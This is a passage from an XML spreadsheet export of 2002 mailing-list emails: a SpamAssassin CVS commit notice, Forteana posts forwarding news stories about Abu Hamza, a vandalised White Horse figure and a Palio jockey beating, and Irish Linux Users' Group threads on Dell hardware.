    <t>Update of /cvsroot/spamassassin/spamassassin\nIn directory usw-pr-cvs1:/tmp/cvs-serv6501\n\nModified Files:\n      Tag: b2_4_0\n	MANIFEST \nLog Message:\nremoved old evolver\n\nIndex: MANIFEST\n===================================================================\nRCS file: /cvsroot/spamassassin/spamassassin/MANIFEST,v\nretrieving revision 1.100.2.11\nretrieving revision 1.100.2.12\ndiff -b -w -u -d -r1.100.2.11 -r1.100.2.12\n--- MANIFEST	28 Aug 2002 13:50:15 -0000	1.100.2.11\n+++ MANIFEST	28 Aug 2002 16:55:16 -0000	1.100.2.12\n@@ -50,7 +50,6 @@\n masses/CORPUS_POLICY\n masses/CORPUS_SUBMIT\n masses/craig-evolve.c\n-masses/evolve.cxx\n masses/freqdiff\n masses/hit-frequencies\n masses/lib/Mail/ArchiveIterator.pm\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>[SACVS] CVS: spamassassin/masses evolve.cxx,1.28,NONE</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/masses\nIn directory usw-pr-cvs1:/tmp/cvs-serv6501/masses\n\nRemoved Files:\n      Tag: b2_4_0\n	evolve.cxx \nLog Message:\nremoved old evolver\n\n--- evolve.cxx DELETED ---\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Jabber - The world's fastest growing \nreal-time communications platform! Don't just IM. Build it in! \n[URL]http://www.jabber.com[/URL]\n_______________________________________________\nSpamassassin-commits mailing list\nSpamassassin-commits@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 09:51:47 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:51:47 +0100</t>
  </si>
  <si>
    <t>Re: [zzzzteana] That wacky imam</t>
  </si>
  <si>
    <t>&gt; Sheikh Abu Hamza al-Masri, our maddest of mad mullahs and a cartoon bogeyman\n&gt; to scare the kiddies, spent a quiet and contemplative bank holiday playing\n&gt; with his own children in Victoria Park, Hackney.\n\nFor an alternative, and rather more factually based, rundown on Hamza's \ncareer, including his belief that all non Muslims in Yemen should be murdered \noutright:\n\n[URL]http://memri.org[/URL]\n\nMartin\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://memri.org http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 28 Aug 2002 09:39:20 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:39:20 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] White Horse vandalised</t>
  </si>
  <si>
    <t>[URL]http://yorkshirepost.co.uk[/URL]\n\nPro-hunt activists target top sight\n\nONE of Yorkshire's most famous sights yesterday became one of the first\ntargets in bizarre attacks on White Horse landmarks linked to the hunting\ndebate.\nVillagers near Thirsk could not believe their eyes when they woke yesterday\nto find the famous White Horse of Kilburn had acquired a rider during the\nnight.\nIn another incident, the Uffington white horse in Oxfordshire had a huntsman\nand three hounds added to the ancient figure, which is thought to represent\na Celtic god or tribal symbol.\nPro-hunt activists in the Real Countryside Alliance (RCA)  a radical\nalternative to the better-known Countryside Alliance  admitted\nresponsibility last night for targeting the two images.\nThe 314ft by 228ft landmark at Kilburn has been lovingly preserved since it\nwas carved in the limestone by schoolmaster John Hodgson and his pupils in\n1857.\nBut during Monday night someone nailed on a massive figure of a huntsman\nwith a horn  which had been cut to scale out of a single piece of white\ncarpet. It was removed yesterday by members of Kilburn White Horse\nAssociation, who found a Countryside Alliance badge attached to the carpet.\nJohn Roberts of the association said: "It has obviously been very well\norganised. It was a well crafted piece of kit: a figure of a huntsman with a\nhorn cut out of carpets.\n"It was big and impressive and could be seen for miles about. They tied it\nto bushes at the top and nailed it down. It caused all the stone chippings\nto be pushed downwards, which will help turn the white horse grey. It will\nnot get another refit for another year.\n"Whoever did it must have come with a vehicle  a tractor and trailer or a\nlorry  because the carpet must have come in one piece. It was extremely\nwell planned and took several people an hour and a half to get it off."\nThe sculpture needs constant work because, unlike chalk horses in the south\nof England, it is cut into limestone which is the wrong colour and needs\nwhitening.\nMr Roberts added: "The damage as such is not great but it adds to the\ndeterioration, which means it will need more work next time.\n"We would have more sympathy if, having made the point, they would come to\ntake it away again because it was a major job."\nAndy Wilson, chief executive of the North York Moors National Park, said:\n"It is a scheduled ancient monument and the local residents are very proud\nof it and go to enormous trouble to keep it white. There is also careful\nconsideration of what shape it should be kept with the constant growth of\nvegetation so you can understand the alarm and regret at any changes. There\nhas not been a cut in the turf  which would be much more of a problem. It\nwould seem it was carefully plotted beforehand."\nAn RCA spokesman said: "Some people in the country are getting very\nfrustrated at the inaction. All we want is Ministers to take notice. Marches\ndon't seem to be doing anything good."\nThe Countryside Alliance said it did not have any part in the action.\nSpokesman Adrian Yelland said: "The Countryside Alliance only ever advocates\ncampaigning that is lawful and dissociates itself from acts of vandalism and\nregrets any damage that may have been caused by this incident."\nThe incident follows graffiti on road signs and motorway bridges in\nYorkshire thought to be RCA work.\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: Philip O Brien &lt;pobrien@atlasalu.ie&gt;\nDate: Wed, 28 Aug 2002 09:36:39 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:36:39 +0100</t>
  </si>
  <si>
    <t>Philip O Brien &lt;pobrien@atlasalu.ie&gt;</t>
  </si>
  <si>
    <t>FW: [ILUG] Using Normal IDE Device with a Dell Latitude CPx lapto p</t>
  </si>
  <si>
    <t>I vote usb 1.1 as the chances are the cdr drive is not over 8x write and\nthus fireware is of no real use...\nbut i cant see how you are going to get it working without a cradle. I cant\neven get my dell laptop dvd drive to work\nas the connectors are not the same as my cd drive ones.. seems dell cant\nkeep any standards going :-(\n\n\n-----Original Message-----\nFrom: Paul Kelly [mailto:longword@esatclear.ie]\nSent: 28 August 2002 09:32\nTo: ilug@linux.ie\nSubject: Re: [ILUG] Using Normal IDE Device with a Dell Latitude CPx\nlaptop\n\n\nJohn P. Looney wrote:\n&gt;&gt;There is absolutely no way to use a conventional 3.5" drive with a\n&gt;&gt;laptop directly.\n&gt;  Ah, they told me that about my A1200.\n&gt; \n&gt;  Worked a charm. Until I dropped the disk one day onto concrete.\n\nGo on. Tell them how long the /first/ one lasted.\n\nI vote external firewire if the laptop has the ports for it.\n\nPaul.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie\n\n\nDISCLAIMER: The information in this message is confidential and may be\nlegally privileged. It is intended solely for the addressee.  Access to this\nmessage by anyone else is unauthorised.  If you are not the intended\nrecipient, any disclosure, copying, or distribution of the message, or any\naction or omission taken by you in reliance on it, is prohibited and may be\nunlawful.  Please immediately contact the sender if you have received this\nmessage in error. Thank you.\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 28 Aug 2002 09:33:47 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:33:47 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] That wacky imam</t>
  </si>
  <si>
    <t>[URL]http://media.guardian.co.uk[/URL],7493,781769,00.html\n\nHamza's horrid - but we must tolerate him\n\nRod Liddle\nWednesday August 28, 2002\nThe Guardian\n\nSheikh Abu Hamza al-Masri, our maddest of mad mullahs and a cartoon bogeyman\nto scare the kiddies, spent a quiet and contemplative bank holiday playing\nwith his own children in Victoria Park, Hackney.\nI've often wondered what incendiary Islamic fundamentalist clerics do on\nstatutory public holidays. Head for the beach and maybe swing by B&amp;Q on the\nway home, I had hoped. I had this beguiling vision of Hamza paddling in the\nsea, an ice-cream cone in his one good hand, the waves tickling his shins,\nand the sheikh mentally preparing to fix those pesky shelves in the kitchen\nfor once, instead of planning the extermination of Zionism and America and\nmaybe me and you, too.\nBut B&amp;Q and a day at the seaside is probably beyond Hamza's budget since the\nBank of England froze his assets, so Victoria Park had to do. But he sounded\nhappy enough when I spoke to him, with the babble of tiny, cheerful, Islamic\nproto-warriors in the background.\nYou must know Hamza; he's the imam designed, it would seem, by the Daily\nMail's cartoonist Mac. Large metal hook in place of a left hand. One eye\ncovered by a patch, the other a baleful, watchful, milky-white. We don't\nmock the disabled any more these days, unless it's someone like Hamza whom\nwe don't like; then, if you'll excuse the inapt phraseology, the gloves come\noff. So Hamza is known (with that vaulting imagination typical of the\nBritish right) as "Captain Hook", in articles which usually call for his\narrest, or extradition to the US, or deportation back home to Egypt or maybe\noff to Pakistan or Afghanistan, where he fought the Russians for years and\nthus sustained his disabilities - anywhere, really; just out of here. And if\nwe can't lock him up or chuck him out of the country, maybe we can force him\nto shut up.\nBecause we don't like Hamza very much. We weren't that fond of him before\nSeptember 11, but afterwards, in that nervy, paranoid few months when we all\nthought the sky might fall in, our disapprobation turned into political\npersecution.\nAnd now the Daily Mirror is agitating again for his arrest because they've\ngot hold of secret videos of the man behaving in an even more inflammatory\nmanner, urging warfare on and looting of enemies of Islam. All out of\ncontext, and a very long time ago, says the imam, not unduly bothered. But\nperhaps he should be, because our reputation for broad-mindedness and\ntolerance towards people like Hamza was thinning even before the Mirror's\nscoop.\nHamza preaches, or preached, at the scary Finsbury Park Mosque - so, earlier\nthis year, the Charity Commissioners banned him from doing so because of his\nallegedly inflammatory remarks. I didn't know Charity Commissioners were\nmeant to do stuff like that.\nHe has had his passport seized and not returned; his assets have been\nfrozen. He is tailed by the police every now and then, and his access to the\nmedia is restricted by internal policing within broadcasting corporations\nand the press. And this last point is because, we tell ourselves, endlessly\n- repeating the mantra over and over again, and fervently wishing it to be\ntrue - Hamza is not "representative" of British Muslims, as if British\nMuslims were a simple, homogenous thing with a single voice that one could\nturn to every now and then for explanation. And perhaps succour.\nThe trouble is, in the first month or so after the twin towers attack he was\nrevealed to be rather more "representative" than the list of those\ngovernment-approved Muslim spokesmen who were - uncomfortably, I suspect -\ndragooned briefly into statements of support for the war against terrorism\nand a blanket condemnation of the Taliban.\nAn opinion poll commissioned by Radio 4's Today programme revealed that an\noverwhelming majority of British Muslims were against George Bush's crusade.\nOne in six were, to put it mildly, ambivalent about the attack on the US\n(the remainder condemned the attack unequivocally). A large majority thought\nthe war against terrorism was a war against Islam.\nWhich is what Hamza said, repeatedly. But it was something that, at the\ntime, we didn't want to hear. Now, if you quiz the man on present policy at\nhome and abroad he comes across - superficially, at least - as someone from\nthe liberal left. No war against Iraq; Britain to become independent of US\nforeign policy and attempt rapprochement with Arab states; stronger action\nagainst Israel; mistrust of global capitalism; redistribution of wealth.\nNor is he particularly anti-semitic, so far as I can tell, although I don't\nsuppose he will be holidaying in Eilat this year. In yesterday's Guardian,\nthe chief rabbi expressed a willingness to talk to Hamza and was grateful\nfor the sheikh's message of condolence when a London synagogue was attacked.\nWhich is not to say that Hamza is a peaceable Jeffersonian democrat who has\nbeen wilfully misrepresented: he is, without question, rather more\ninflammatory in private sermons to his own people than he is in public. His\nideology is an arid and uncompromising interpretation of Islam: he would be\nhappy, in a truly Islamic society, to stone women to death for adultery, for\nexample. You and I would find many - perhaps most - of his views utterly\nrepellent.\nAnd that's the point. Because Hamza is the true test of our apparent desire\nto be multicultural. Multiculturalism is not, surely, the cheerful\nappropriation of bits of inoffensive minority cultural behaviour by the\nruling hegemony. That is a sort of syncopated monoculturalism.\nMulticulturalism is, rather, the ability of society to tolerate views that\nare antithetical to the dominant culture - and maybe learn from them.\nThe FBI has been investigating Hamza, but, of course, has found nothing\nremotely incriminating. The real reason for his vilification and persecution\nis simply the pungency of his views.\nIt is often said that we should shut him up or arrest him because his\nrhetoric increases hostility against the Muslim population generally. This\nis a perfectly noble argument, but it does not wash.\nYou don't defuse a difficult situation by pretending it doesn't exist. And\nif British Muslims - maybe a minority, maybe not - feel a growing sense of\nunease or mystification at the direction of western foreign policy, it is\nnot because they have been led in that direction by Hamza. Shutting the man\nup, therefore, won't make a difference.\nIt is rather as Louis MacNeice had it:\nThe glass is falling hour by hour, the glass will fall for ever.\nBut if you break the bloody glass, you won't hold up the weather.\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://media.guardian.co.uk http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 09:33:16 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:33:16 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Six arrested for attacking Palio jockey who defected</t>
  </si>
  <si>
    <t>The Electronic Telegraph\n\n Six arrested for attacking Palio jockey who defected \n By Bruce Johnston in Rome\n (Filed: 28/08/2002) \n \n \n Police waded into the intrigues and enmities surrounding the Palio, Siena's\n traditional bareback horse race, for the first time yesterday, arresting six\n people for beating up a star jockey who defected to a rival team.\n \n \n Angry spectators attack Giuseppe Pes at the Palio horse race in Siena \n Giuseppe Pes, a champion jockey of Sardinian extraction who has won the Palio\n nine times in 38 runs, was closely associated with the Istrice, or Porcupine,\n contrada - section of town - until the race earlier this month.\n \n Istrice did not have a horse in the contest - only 10 of the 17 contradas take\n part in each Palio - but, despite promises to the contrary, moments before the\n off Mr Pes mounted the horse of Lupa, or She-Wolf.\n \n Lupa are Istrice's historic rivals, and the defection was not taken well. Lupa\n did not win, victory going instead to Tartuca, tortoise.\n \n As its supporters erupted into joyous celebrations, Mr Pes was pulled from his\n mount by Istrice members and savagely beaten and kicked for seven minutes.\n \n Mr Pes, 39, whose jacket with his contrada's colours was torn from his back,\n was sent to hospital with fractures, cuts and bruises.\n \n Three of his attendants who tried to intervene were also beaten. Police\n yesterday arrested six people they said had been identified as the attackers\n from video footage.\n \n Experts said it was the first time that members of a contrada - known as\n contradaioli - had been arrested for beating up a jockey, despite the fact\n that such episodes belong to the race's ancient traditions.\n \n The Palio, which was first raced in the 14th century, is held twice a year on\n the cobbles of Siena's main square. For weeks beforehand supporters parade\n through the city, singing, waving flags and wearing their contrada colours.\n But by the day of the race the good humour evaporates.\n \n The event has no rules and is prepared for and run amid an extraordinary\n undercurrent of intrigue and even violence. Jockeys may swap sides at the last\n minute, take bribes, and whip rivals' horses, and more, so long as they do not\n grab their reins.\n \n The origins of the contrada lie in the Middle Ages, when the neighbourhoods'\n boundaries were set out to aid the many mercenary companies hired to defend\n Siena's fiercely earned independence from Florence and other city states.\n \n The first Palio of the year takes place on July 2, to commemorate the miracles\n of the Madonna of Provenzano, and a second race on Aug 16 marks the feast of\n the Assumption of the Virgin.\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Martin Adamson" &lt;martin@srv0.ems.ed.ac.uk&gt;\nDate: Wed, 28 Aug 2002 09:31:57 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:31:57 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Emigrate to Russia? That's a steppe too far</t>
  </si>
  <si>
    <t>The Electronic Telegraph\n\n Emigrate to Russia? That's a steppe too far\n (Filed: 28/08/2002) \n \n \n So you think you've got it bad: fed up with Folkestone, bored with Birmingham\n or sick of Sheffield.\n \n Those 54 per cent of Britons - according to a Daily Telegraph/YouGov survey\n this week - who dream of a stress-free life in sunnier climes should perhaps\n heed a word of friendly advice on the realities of living abroad.\n \n Kommersant, a Russian daily newspaper, yesterday offered those dissatisfied\n with life in Blair's Britain a taste of what to expect should they choose to\n emigrate to provincial Russia.\n \n After reading about the gripes of affluent Britons, its tongue-in-cheek\n article admitted, however, that the grass was not always greener on the other\n side.\n \n "The inhabitants of foggy Albion keen to travel could go to any Russian city\n deep in the provinces where things are quiet," said Kommersant.\n \n "In any central Russian district, life, by British standards, is unseemingly\n cheap and remarkably laid back. By 11am most of the working population are\n becoming 'traditionally' relaxed."\n \n The time for elevenses in Britain - perhaps the opportunity for a quiet cup of\n tea and a chocolate Hobnob - is known in Russia as the Wolf Hour.\n \n It was so named in Soviet times because at 11am a wolf appeared from the\n famous animal clock at the Obrasov Puppet Theatre in Moscow. It is also\n opening time in the nation's vodka shops.\n \n And the vodka, like all other spirits, is cheap. Kommersant pointed out that\n "the money a Briton can earn from selling even the most shabby house would be\n enough to support them at the local standard of living for the rest of their\n life.\n \n "The local shops are full of all they would need and they could buy a bottle\n of whisky for kopecks."\n \n There are 100 kopecks in a ruble and the ruble is currently worth about a\n halfpenny in sterling.\n \n The whisky is cheap, however, because it is unlike anything the average Briton\n will have consumed before. It is made of samagon - home-distilled, moonshine\n vodka - coloured with tea, and is a popular beverage in rural areas and among\n diehard alcoholics.\n \n While alcohol is plentiful and cheap, food may not be so easy to come by. The\n newspaper pointed out that traditional British foodstuffs - it selected oxtail\n soup as an example - were in short supply. However, the wealth of the British\n settler should overcome the difficulty.\n \n "For a modest reward in most Russian villages, the locals would happily cut\n off the tails from the entire collective farm's herd of cattle."\n \n One or two potential emigrs might be deterred by language difficulties. There\n are few English speakers to be found among the green hills of Tula on the\n Mongolian border.\n \n However, Kommersant pointed out, language difficulties were not considered a\n deterrent by the 13 per cent of Britons who nominated France as the country in\n which they would like to live.\n \n France, the Russian paper claimed, was a country "where English is only known\n by the beggars, Belorussian prostitutes and Russian tourists".\n \n Despite the low cost of living and the easy-going lifestyle, the Russian\n weather remains a major stumbling block for Britons.\n \n Even in the most temperate regions, winter temperatures of -20C are common.\n And somewhere like the Sakha Republic - east of Siberia and the coldest place\n in the world - enjoys just one month of summer and endures winter temperatures\n that drop below -70C. Houses are built on concrete stilts because the\n permafrost makes digging foundations impossible.\n \n Again, the Russian paper had a word of reassurance. While acknowledging the\n climatic problems, it said that "thanks to global warming this difficulty will\n solve itself".\n \n Kommersant also had an answer to the labour crisis that would be created in\n Britain if 54 per cent of its citizens decided to opt for a life in Russia.\n \n "Thirty-three million Russians could be sent to Britain to replace the 33\n million who leave. We think that the required number could probably be found\n amongst our citizens."\n \n Unfortunately for those 33 million Russians, however, not one of those Britons\n surveyed who wanted to move abroad nominated the Russian steppes as their\n preferred new home.\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Paul Kelly &lt;longword@esatclear.ie&gt;\nDate: Wed, 28 Aug 2002 09:31:55 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:31:55 +0100</t>
  </si>
  <si>
    <t>Paul Kelly &lt;longword@esatclear.ie&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Using Normal IDE Device with a Dell Latitude CPx laptop</t>
  </si>
  <si>
    <t>John P. Looney wrote:\n&gt;&gt;There is absolutely no way to use a conventional 3.5" drive with a\n&gt;&gt;laptop directly.\n&gt;  Ah, they told me that about my A1200.\n&gt; \n&gt;  Worked a charm. Until I dropped the disk one day onto concrete.\n\nGo on. Tell them how long the /first/ one lasted.\n\nI vote external firewire if the laptop has the ports for it.\n\nPaul.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: Aherne Peter-pahern02 &lt;peter.aherne@motorola.com&gt;\nDate: Wed, 28 Aug 2002 09:29:19 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:29:19 +0100</t>
  </si>
  <si>
    <t>Aherne Peter-pahern02 &lt;peter.aherne@motorola.com&gt;</t>
  </si>
  <si>
    <t>[ILUG] [OT] Dell machine giving me hassle.</t>
  </si>
  <si>
    <t>Ok, Iknow this is blatantly OT but I'm beginning to go insane.\nHad an old Dell Dimension XPS sitting in the corner and decided to\nput it to use, I know it was working pre being stuck in the\ncorner, but when I plugged it in, hit the power nothing happened.\nI opened her up and had a look and say nothing much. A little orange\nLED comes on when I plug her in but that's it, after some googling\nI found some reference to re-seating all the parts, but no change.\nThe problem I'm having is that since the power supply is some Dell\nspecific one, ATX block with what looks like one of the old AT\npower connectors, I cant figure out weather this is a Mobo prob\nor a PSU prob. Just to futily try and drag this back OT, I want\nto install Linux on it when I get it working. If anyone knows\nwhat the problem might be give me a shout.\n\nCheers,\nPeter.\n\n--\nPeter Aherne, Software Engineer, \nMotorola Ireland Ltd.\nPh: +353 21 4511234 Mobile: +353 87 2246834\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 28 Aug 2002 09:28:35 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:28:35 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Height, weight, girth, etc</t>
  </si>
  <si>
    <t>[URL]http://www.guardian.co.uk[/URL],3604,781616,00.html\n\nBritons stand tall, if slightly heavy, in Europe\n\nJohn Carvel, social affairs editor\nWednesday August 28, 2002\nThe Guardian\n\nNot every European dimension has been harmonised in Brussels yet. According\nto the Department for Trade and Industry, the average Briton stands head,\nshoulders, girth and bottoms above their continental partners.\nThe figures come in a new edition of the department's handbook of\nanthropometric and strength measurements, compiled by ergonomists at the\nUniversity of Nottingham to help manufacturers design products to fit\npeople's shape.\nThe volume provides 294 measurements ranging from the distance between the\ninner corners of the eyes to the length of the leg between the crease below\nthe buttock to the crease at the back of the knee.\nIt has discovered that the average British man is 36 millimetres (1 inches)\ntaller than his French counterpart.\nThe mean height of UK citizens is 1,755.1mm (5ft 9in). Among European men\nonly the Dutch are taller, averaging 1,795mm and with a clear height\nadvantage over the US men's average of 1,760.4.\nThe average British woman is 1,620mm tall (just under 5ft 4in), compared\nwith 1,604mm for her French counterpart, 1,610mm for the Italians and\n1,619mm for the Germans. Swedish women average 1,640mm, Dutch 1,650mm and\nAmericans 1,626.7mm\nMore disturbingly, British men and women are heavier than all the other\nnationalities except the Americans, averaging 79.75 kilos for British men\nand 66.7 for women.\nThe average British woman has a chest measurement of 1,007.8mm (39.7\ninches), compared with 965mm for the Italians, 912.6mm for the Japanese and\n806mm for Sri Lankans. American women also top this scale with an average of\n1,047.2mm.\nThe average British woman's waist is 840.6mm (33 inches) - also second\nlargest behind the Americans. But her bottom at 873.7mm is considerably\nsmaller than the Italians at 916mm who beat the Americans into second place.\nThe average British male foot is 266.8mm long (10.5 inches), 6mm longer than\nthe French and Germans, 3mm more than the Italians and 1mm more than the\nSwedes. But they are just beaten by the Americans at 267.8mm and massively\noutstripped by the Dutch at 275mm.\nHowever Dutch women have daintier feet than the British, averaging 240mm\ncompared with 241.1mm in the UK (9.5 inches). German women average 242mm,\ncompared with 245mm for the Swedes and 242.1mm for the Americans.\nThe DTI has a less than exhaustive record of ring finger lengths, but on the\navailable evidence the British man's finger at 78.7mm (3.1 inches) is 1.7mm\nlonger than his German counterpart, but 0.2mm shorter than the American\naverage.\nThe British woman's ring finger at 72.6mm is 0.4mm smaller than her German\ncounterpart and 0.3mm smaller than the American.\nBeverley Norris, research fellow at Nottingham university's institute for\noccupational ergonomics, said the figures were useful for product designers.\nThe department has recently completed a study of the pulling force needed to\nopen ring pull cans.\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.guardian.co.uk http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: zzzzteana &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Wed, 28 Aug 2002 09:24:34 +0100</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:24:34 +0100</t>
  </si>
  <si>
    <t>[zzzzteana] Cambodian Buddhaas unearthed</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n\nTuesday, 27 August, 2002, 21:35 GMT 22:35 UK\nCambodia temple ruins yield treasure\n\nWorkers clearing dense jungle near the ruins of an ancient pagoda in\nnorthern Cambodia have unearthed 31 Buddha statues - 27 of them solid gold.\nThe statues - which are 10 centimetres (4 inches) tall - are in good\ncondition and believed to be hundreds of years old.\nThey were found on Saturday as workers were rebuilding the Po Pich temple\nabout 100 km (65miles) north of the capital, Phnom Penh.\nThe pagoda, in the Batay district of Kampong Thom province, was torn down\nduring the reign of the Khmer Rouge in the 1970s and the area became\novergrown.\nCommunity care\nDeputy police chief of Kampong Thom province, Hang Sithim, said the statues\n- three of which were silver and one bronze - were buried in about one metre\n(3.4ft) of earth and each weigh around 500 grams (1lb).\n''I think that these Buddha statues had been buried hundreds of years ago,\nwhen the last temple was fully operating," Mr Hang Sithim said.\nProvincial authorities initially planned to take the statues to a nearby\ntown for safekeeping, but opted to allow the Buddhist community at the\ntemple to take care of them.\n''We believe they are safe there,'' said Som Somphat, deputy governor of\nKampong Thom province.\n''The people of Po Pich pledged to treat them with respect and honour.''\nReign of terror\nA police guard has been placed around the site to protect it from looters.\nThe Khmer Rouge waged civil war in Cambodia between 1970 and 1998 and\ncontrolled the country between 1975 and 1979.\nThe regime outlawed religion and destroyed many objects regarded as decadent\nor culturally impure.\nAbout two million people died in the Khmer Rouge's drive to turn Cambodia\ninto a farmers' utopia.\n \n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 28 Aug 2002 09:22:34 -0500</t>
  </si>
  <si>
    <t>Wed, 28 Aug 2002 09:22:34 -0500</t>
  </si>
  <si>
